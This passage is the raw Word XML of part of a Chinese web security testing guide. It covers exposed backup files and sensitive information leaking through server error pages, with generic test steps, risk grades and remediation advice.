        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>集网站敏感信息，从而有针对性的进行利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD7541" w14:textId="77777777" w:rsidR="00757422" w:rsidRPr="003567BE" w:rsidRDefault="00757422" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17FE13" w14:textId="6095AED9" w:rsidR="00757422" w:rsidRPr="003567BE" w:rsidRDefault="00535B3F" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00237BA2" w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄露重要敏感信息，或能够进行核心业务操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F283F85" w14:textId="4D4BA362" w:rsidR="00535B3F" w:rsidRPr="003567BE" w:rsidRDefault="00535B3F" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00237BA2" w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄露一般重要信息，做只能进行一般功能操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DC0E4C" w14:textId="69C7C5AF" w:rsidR="00535B3F" w:rsidRPr="003567BE" w:rsidRDefault="00535B3F" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00237BA2" w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面泄露非重要信息，不能进行相关功能操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B1955" w14:textId="77777777" w:rsidR="00757422" w:rsidRPr="003567BE" w:rsidRDefault="00757422" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C03867" w14:textId="77777777" w:rsidR="007F3046" w:rsidRPr="003567BE" w:rsidRDefault="007F3046" w:rsidP="00E9007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站管理员严格检查</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中可访问的路径下是否存在备份文件，常见备份文件后缀为</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.jsp.bak</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.bak</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.sql</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、等等。如果有这些文件，直接将该备份文件进行转移到其他目录或者直接删除即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626577E1" w14:textId="69406E74" w:rsidR="00757422" w:rsidRPr="003567BE" w:rsidRDefault="007F3046" w:rsidP="00E9007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>严格控制可网站可访问目录下的文件敏感度的存放问题，不要将敏感文件置于该目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73571B59" w14:textId="64EB9548" w:rsidR="00D5237F" w:rsidRPr="003567BE" w:rsidRDefault="00D5237F" w:rsidP="00A65FBB">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>注意事项：</w:t>
      </w:r>
      <w:r w:rsidRPr="003567BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCE43DA" w14:textId="46C286EF" w:rsidR="00757422" w:rsidRPr="00F36038" w:rsidRDefault="00757422" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc498434474"/>
      <w:r w:rsidRPr="00F36038">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错页面敏感信息泄漏</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="4AEF724A" w14:textId="4B8E3156"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00355BC3" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误页面由服务器产生</w:t>
      </w:r>
      <w:r w:rsidR="00355BC3" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>403</w:t>
      </w:r>
      <w:r w:rsidR="00355BC3" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00355BC3" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
      <w:r w:rsidR="00355BC3" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00355BC3" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidR="00355BC3" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等错误时，返回详细错误信息。报错信息中可能会包含服务器代码信息、数据库连接信息、</w:t>
      </w:r>
      <w:r w:rsidR="00355BC3" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00355BC3" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句或者敏感文件的路径，为攻击者收集信息提供了方便。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F004DD5"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6D320" w14:textId="77FBFB53" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="00355BC3" w:rsidP="00501D2E">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过目录扫描或手工输入不存在的文件或路径，触发</w:t>
      </w:r>
      <w:r w:rsidR="005A34A0" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器产生</w:t>
      </w:r>
      <w:r w:rsidR="005A34A0" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
      <w:r w:rsidR="005A34A0" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误并返回</w:t>
      </w:r>
      <w:r w:rsidR="005A34A0" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
      <w:r w:rsidR="005A34A0" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA5F6A" w14:textId="04323473" w:rsidR="005A34A0" w:rsidRPr="00501D2E" w:rsidRDefault="005A34A0" w:rsidP="00501D2E">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过目录扫描或手工输入一个无权限查看的文件或路径，触发服务器产生</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>403</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误并返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>403</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A4E542" w14:textId="15050FF5" w:rsidR="005A34A0" w:rsidRPr="00501D2E" w:rsidRDefault="005A34A0" w:rsidP="00501D2E">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>手工输入</w:t>
      </w:r>
      <w:r w:rsidR="00D74FD4" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不存在的参数或</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特殊构造的字符串，</w:t>
      </w:r>
      <w:r w:rsidR="00D74FD4" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如单引号，尖括号等，</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发服务器产生</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误并返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidR="00BA377C" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或异常信息</w:t>
      </w:r>
      <w:r w:rsidR="004908CA" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3344A657" w14:textId="42F98414" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="00F33033" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析：</w:t>
      </w:r>
      <w:r w:rsidR="005E3104" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可通过上述几种方式触发</w:t>
      </w:r>
      <w:r w:rsidR="005E3104" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="005E3104" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序报错，提取报错信息泄露的敏感信息，如</w:t>
      </w:r>
      <w:r w:rsidR="005E3104" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="005E3104" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间件的版本信息、数据库连接信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE1B43"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1158DA5F" w14:textId="27E335A5" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="00517A3F" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="005508B9" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启调试模式，泄露大量应用的敏感信息如代码、报错信息等</w:t>
      </w:r>
      <w:r w:rsidR="00E25C89" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC65FBE" w14:textId="136BC46C" w:rsidR="00517A3F" w:rsidRPr="00501D2E" w:rsidRDefault="00517A3F" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="005508B9" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未开启调试模式，泄露部分中间件版本、少量代码信息等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BE19E6"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167299F8" w14:textId="77777777" w:rsidR="005E520B" w:rsidRPr="00501D2E" w:rsidRDefault="005E520B" w:rsidP="00501D2E">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>编码时</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
